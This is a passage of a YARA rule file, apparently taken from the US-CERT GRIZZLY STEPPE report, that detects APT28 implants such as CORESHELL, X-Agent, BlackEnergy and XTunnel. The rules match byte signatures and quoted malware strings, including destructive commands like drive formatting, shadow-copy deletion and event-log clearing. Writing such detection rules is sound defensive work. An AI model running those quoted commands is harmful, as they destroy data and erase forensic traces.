    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 55 8B EC 6A FE 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6A 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v12 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 48 83 [2] 48 89 [3] C7 44 [6] 4C 8D 05 [3] 00 BA 01 00 00 00 33 C9 FF 15 [2] 00 00 FF 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v13 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 83 ?? 06 [7-17] FA [0-10] 45 [2-4] 48 [2-4] E8 [2] FF FF [6-8] 48 8D [3] 48 89 [3] 45 [2] 4? [1-2] 01 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v14 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89 74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D 04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76 4C 89 6C 24 }
    $STR2 = { C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D 04 ?? 46 0F B6 0C ?? 40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 }
    $STR3 = { 41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04 1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA }
    $STR4 = { 46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03 C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 41 0F AF CB C1 }
  condition:
    (uint16(0) == 23117) and any of them
}

rule IMPLANT_2_v15 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $XOR_LOOP1 = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 }
    $XOR_LOOP2 = { 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 }
    $XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_2_v16 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $OBF_FUNCT = { 0F B6 1C 0B 8D 34 08 8D 04 0A 0F AF D8 33 D2 8D 41 FF F7 75 F8 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 8B 45 DC 72 9A }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and $OBF_FUNCT
}

rule IMPLANT_2_v17 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 24 10 8B 44 24 1C 89 44 24 14 8B 44 24 24 68 36 }
    $STR2 = { 51 8D 4D DC 51 6A 01 8B D0 8B 4D E4 E8 36 04 00 }
    $STR3 = { E4 81 78 06 15 91 DF 75 74 04 33 F6 EB 1A 8B 48 }
    $STR4 = { 33 D2 F7 75 F8 8B 45 D4 02 D9 03 C6 41 32 1C 3A }
    $STR5 = { 00 6A 00 56 FF D0 83 F8 FF 74 64 6A 00 8D 45 F8 }
  condition:
    (uint16(0) == 23117) and 2 of them
}

rule IMPLANT_2_v18 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 8A C1 02 C0 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 0C 88 5D FF 8B 5D EC 83 C2 FE 03 D8 89 55 E0 89 5D DC 8D 49 00 03 C1 8D 34 0B 0F B6 1C 0A 0F AF D8 33 D2 8D 41 FF F7 75 F4 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45 F8 72 9B 8B 4D F0 8B 5D D8 8B 7D 08 8B F0 41 83 C6 06 89 4D F0 89 75 F8 3B 4D D4 0F 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 C0 2B F8 EB 02 33 FF 3B FA 0F 83 ?? ?? ?? ?? 8B 5D EC 8A C1 02 C0 83 C3 FE 8D 14 08 8D 04 49 02 D2 03 C0 88 55 0B 8D 48 FE 8D 57 02 03 C3 89 4D D4 8B 4D 0C 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00 00 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_2_v19 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $obfuscated_RSA1 = { 7C 41 B4 DB ED B0 B8 47 F1 9C A1 49 B6 57 A6 CC D6 74 B5 52 12 4D FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2 E3 7B 1E B8 09 3C AF 76 A1 38 56 76 BB A0 63 B6 9E 5D 86 E4 EC B0 DC 89 1E FA 4A E5 79 81 3F DB 56 63 1B 08 0C BF DC FC 75 19 3E 1F B3 EE 9D 4C 17 8B 16 9D 99 C3 0C 89 06 BB F1 72 46 7E F4 0B F6 CB B9 C2 11 BE 5E 27 94 5D 6D C0 9A 28 F2 2F FB EE 8D 82 C7 0F 58 51 03 BF 6A 8D CD 99 F8 04 D6 F7 F7 88 0E 51 88 B4 E1 A9 A4 3B }
    $cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01 00 01 00 AF BD 26 C9 04 65 45 9F 0E 3F C4 A8 9A 18 C8 92 00 B2 CC 6E 0F 2F B2 71 90 FC 70 2E 0A F0 CA AA 5D F4 CA 7A 75 8D 5F 9C 4B 67 32 45 CE 6E 2F 16 3C F1 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC C7 30 B2 9E 0B 90 F8 B2 94 90 1D 52 B5 2F F9 8B E2 E6 C5 9A 0A 1B 05 42 68 6A 3E 88 7F 38 97 49 5F F6 EB ED 9D EF 63 FA 56 56 0C 7E ED 14 81 3A 1D B9 A8 02 BD 3A E6 E0 FA 4D A9 07 5B E6 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and any of them
}

rule IMPLANT_2_v20 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $func = { 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 8B 45 D8 89 55 F8 72 A0 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_3_v1 {
  meta:
    description = "X-Agent/CHOPSTICK Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = ">process isn't exist<" ascii wide
    $STR2 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii wide
    $STR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" ascii wide
    $STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide
    $STR5 = { 0F B6 14 31 88 55 ?? 33 D2 8B C1 F7 75 ?? 8B 45 ?? 41 0F B6 14 02 8A 45 ?? 03 FA }
  condition:
    any of them
}

rule IMPLANT_3_v2 {
  meta:
    description = "X-Agent/CHOPSTICK Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $base_key_moved = { C7 45 ?? 3B C6 73 0F C7 45 ?? 8B 07 85 C0 C7 45 ?? 74 02 FF D0 C7 45 ?? 83 C7 04 3B C7 45 ?? FE 72 F1 5F C7 45 ?? 5E C3 8B FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8 C7 45 ?? B1 D1 FF FF C7 45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45 ?? 33 35 }
    $base_key_b_array = { 3B C6 73 0F 8B 07 85 C0 74 02 FF D0 83 C7 04 3B FE 72 F1 5F 5E C3 8B FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B FF 55 8B EC 83 EC 10 A1 33 35 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and any of them
}

rule IMPLANT_3_v3 {
  meta:
    description = "X-Agent/CHOPSTICK Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = ".?AVAgentKernel@@"
    $STR2 = ".?AVIAgentModule@@"
    $STR3 = "AgentKernel"
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and any of them
}

rule IMPLANT_4_v1 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64 C6 45 DA 76 C6 45 DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF 32 C6 45 E0 2E E9 ?? ?? ?? ?? }
    $STR2 = { C7 45 EC 5A 00 00 00 C7 45 E0 46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and 1 of them
}

rule IMPLANT_4_v2 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $BUILD_USER32 = { 75 73 65 72 ?? ?? ?? 33 32 2E 64 }
    $BUILD_ADVAPI32 = { 61 64 76 61 ?? ?? ?? 70 69 33 32 }
    $CONSTANT = { 26 80 AC C8 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_4_v3_AlternativeRule {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    comment = "Alternative rule - not based on the original samples but samples on which the original rule matched"
    author = "Florian Roth"
    reference = "US CERT Grizzly Steppe Report"
    date = "2017-02-12"
    hash1 = "2244fe9c5d038edcb5406b45361613cf3909c491e47debef35329060b00c985a"
  strings:
    $op1 = { 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 53 1E 01 00 }
    $op2 = { 21 DA 40 00 00 A0 40 00 08 A0 40 00 B0 70 40 00 }
  condition:
    (uint16(0) == 23117 and all of them)
}

rule IMPLANT_4_v4 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $DK_format1 = "/c format %c: /Y /Q" ascii
    $DK_format2 = "/c format %c: /Y /X /FS:NTFS" ascii
    $DK_physicaldrive = "PhysicalDrive%d" wide
    $DK_shutdown = "shutdown /r /t %d"
  condition:
    uint16(0) == 23117 and all of ($DK*)
}

rule IMPLANT_4_v5 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $GEN_HASH = { 0F BE C9 C1 C0 07 33 C1 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_4_v7 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $sb1 = { C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C }
    $sb2 = { C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C }
    $sb3 = { C7 [1-5] 61 64 76 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C }
    $sb4 = { C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C }
    $sb5 = { C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C }
    $sb6 = { C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C }
    $sb7 = { C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C }
    $sb8 = { C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C }
    $sb9 = { C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C }
    $sb10 = { C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and 3 of them
}

rule IMPLANT_4_v8 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $f1 = { 5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4 33 C9 03 D0 4A 41 3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 C7 04 03 5C 20 56 57 8D 3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50 68 00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9 7C F8 5B 83 EC 04 8B D4 50 6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF 57 18 }
    $f2 = { 5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08 2B 45 10 89 45 E8 33 C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00 8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 8B 42 04 83 E8 08 D1 E8 89 45 F8 8B 4D EC 83 C1 08 89 4D FC }
    $f3 = { 5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF 66 8B 18 66 81 FB 4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66 8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83 EC 60 8B FC B9 60 00 00 00 F3 A4 83 EF 60 6A 0D 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68 65 6C 54 FF 57 }
    $a1 = { 83 EC 04 60 E9 1E 01 00 00 }
  condition:
    $a1 at pe.entry_point or any of ($f*)
}

rule IMPLANT_4_v9 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $a = "wevtutil clear-log" ascii wide nocase
    $b = "vssadmin delete shadows" ascii wide nocase
    $c = "AGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6" ascii wide nocase
    $d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase
    $openPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52 50 E8 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 10 84 C0 75 21 33 C0 89 44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 0B 83 C3 01 81 FB 00 01 00 00 7C B6 }
    $f = { 83 C4 0C 53 53 6A 03 53 6A 03 68 00 00 00 C0 }
  condition:
    ($a and $b) or $c or $d or ($openPhysicalDiskOverwriteWithZeros and $f)
}

rule IMPLANT_4_v10 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $ = { A1 B0 5C 72 }
    $ = { EB 3D 03 84 }
    $ = { 6F 45 59 4E }
    $ = { 71 81 5A 4E }
    $ = { D5 B0 3E 72 }
    $ = { 6B 43 59 4E }
    $ = { F5 72 99 3D }
    $ = { 66 5D 9D C0 }
    $ = { 0B E7 A7 5A }
    $ = { F3 74 43 C5 }
    $ = { A2 A4 74 BB }
    $ = { 97 DE EC 67 }
    $ = { 7E 0C B0 78 }
    $ = { 9C 96 78 BF }
    $ = { 4A 37 A1 49 }
    $ = { 86 67 41 6B }
    $ = { 0A 37 5B A4 }
    $ = { DC 50 5A 8D }
    $ = { 02 F1 F8 08 }
    $ = { 2C 81 97 12 }
  condition:
    uint16(0) == 23117 and uint16(uint32(60)) == 17744 and 15 of them
}

rule IMPLANT_4_v11 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $ = "/c format %c: /Y /X /FS:NTFS"
    $ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
    $ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide
    $ = ".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cf g.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide
    $tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and 2 of them
}

rule IMPLANT_4_v13 {
  meta:
    description = "BlackEnergy / Voodoo Bear Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $XMLDOM1 = { 81 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60 }
    $XMLDOM2 = { 90 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60 }
    $XMLPARSE = { 8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00 66 83 7D ?C FF 75 3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 C0 78 2? }
    $EXP1 = "DispatchCommand"
    $EXP2 = "DispatchEvent"
    $BDATA = { 85 C0 74 1? 0F B7 4? 06 83 C? 28 [0-6] 72 ?? 33 C0 5F 5E 5B 5D C2 08 00 8B 4? 0? 8B 4? 0? 89 01 8B 4? 0C 03 [0-2] EB E? }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_5_v1 {
  meta:
    description = "XTunnel Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $hexstr = { 2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00 70 00 00 00 2D 00 50 00 69 00 00 00 2D 00 50 00 70 00 00 00 }
    $UDPMSG1 = "error 2005 recv from server UDP - %d\x0a"
    $TPSMSG1 = "error 2004 send to TPS - %d\x0a"
    $TPSMSG2 = "error 2003 recv from TPS - %d\x0a"
    $UDPMSG2 = "error 2002 send to server UDP - %d\x0a"
  condition:
    any of them
}

rule IMPLANT_5_v2 {
  meta:
    description = "XTunnel Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $key0 = { 98 7A B9 99 FE 09 24 A2 DF 0A 41 2B 14 E2 60 93 74 6F CD F9 BA 31 DC 05 53 68 92 C3 3B 11 6A D3 }
    $key1 = { 8B 23 6C 89 2D 90 2B 0C 9A 6D 37 AE 4F 98 42 C3 07 0F BD C1 40 99 C6 93 01 58 56 3C 6A C0 0F F5 }
    $key2 = { E4 7B 7F 11 0C AA 1D A6 17 54 55 67 EC 97 2A F3 A6 E7 B4 E6 80 7B 79 81 D3 CF BD 3D 8F CC 33 73 }
    $key3 = { 48 B2 84 54 5C A1 FA 74 F6 4F DB E2 E6 05 D6 8C ED 8A 72 6D 05 EB EF D9 BA AC 16 4A 79 49 BD C1 }
    $key4 = { FB 42 15 58 E3 0F CC D9 5F A7 BC 45 AC 92 D2 99 1C 44 07 22 30 F6 FB EA A2 11 34 1B 5B F2 DC 56 }
    $key5 = { 34 F1 AE 17 01 7A F1 60 21 AD A5 CE 3F 77 67 5B BC 6E 7D EC 64 78 D6 07 8A 0B 22 E5 FD FF 3B 31 }
    $key6 = { F0 EA 48 F1 64 39 51 86 E6 F7 54 25 6E BB 81 2A 2A FE 16 8E 77 ED 95 01 F8 B8 E6 F5 B7 21 26 A7 }
    $key7 = { 0B 6E 99 70 A8 EA F6 8E E1 4A B4 50 05 35 7A 2F 33 91 BE AA 7E 53 AB 76 0B 91 6B C2 B3 91 6A BE }
    $key8 = { FF 03 2E A7 ED 24 36 CF 6E EA 1F 74 1F 99 A3 52 2A 61 FD A8 B5 A8 1E C0 3A 89 83 ED 1A ED AB 1A }
    $key9 = { F0 DA C1 DD FE F7 AC 6D E1 CB E1 00 65 84 53 8F E6 50 38 9B F8 56 5B 32 E0 DE 1F FA CB CB 14 BB }
    $key10 = { A5 D6 99 A3 CD 45 10 AF 11 F1 AF 76 76 02 05 5C 52 3D F7 4B 94 52 7D 74 31 9D 6E FC 68 83 B8 0D }
    $key11 = { 59 51 B0 26 96 C1 D5 A7 B2 85 1D 28 87 23 84 DA 60 7B 25 F4 CE A2 68 FF 3F D7 FB A7 5A B3 B4 B3 }
    $key12 = { 04 65 D9 9B 26 AF 42 D8 34 60 01 BB 83 85 95 E3 01 BA D8 CF 5D 40 CE 9C 17 C9 44 71 7D F8 24 81 }
    $key13 = { 5D FE 1C 83 AD 5F 5C E1 BF 5D 9C 42 E2 32 25 E3 EC FD B2 49 3E 80 E6 55 4A 2A C7 C7 22 EB 48 80 }
    $key14 = { E9 65 03 96 C4 5F 77 83 BC 14 C5 9F 46 EA 82 32 E8 35 7C 26 B5 62 7B FF 8C 42 C6 AE 2E 0F 2E 17 }
    $key15 = { 74 32 AE 38 91 25 BB 4E 39 80 ED 7F 6A 6F B2 52 A4 2E 78 5A 90 F4 59 1C 36 20 CA 64 2F F9 7C A3 }
    $key16 = { 2B 2A DB BC 4F 96 0A 89 16 F7 08 80 67 BA D3 0B E8 4B 65 78 3F BF 94 76 DF 5F DA 0E 58 56 B1 83 }
    $key17 = { 80 8C 3F D0 22 4A 59 38 41 61 B8 A8 1C 8B B4 04 D7 19 7D 16 D8 11 8C B7 70 67 C5 C8 BD 76 4B 3E }
    $key18 = { 02 8B 0E 24 D5 67 5C 16 C8 15 BF E4 A0 73 E9 77 8C 66 8E 65 77 1A 1C E8 81 E2 B0 3F 58 FC 7D 5B }
    $key19 = { 87 8B 7F 5C F2 DC 72 BA F1 31 9F 91 A4 88 09 31 EE 97 96 65 B1 B2 4D 33 94 FE 72 ED FA EF 48 81 }
    $key20 = { 7A C7 DD 6C A3 4F 26 94 81 C5 26 25 4D 2F 56 3B C6 EC A1 77 9F EE AA 33 EC 1C 20 E6 0B 68 67 85 }
    $key21 = { 30 44 F1 D3 94 18 68 15 DD 8E 3A 2B BD 91 66 83 7D 07 FA 1C F6 A5 50 E2 C1 70 C9 CD D9 30 52 09 }
    $key22 = { 75 44 DC 09 5C 44 1E 39 D2 58 64 8F E9 CB 12 67 D2 0D 83 C8 B2 D3 AB 73 44 74 40 1D A4 93 26 19 }
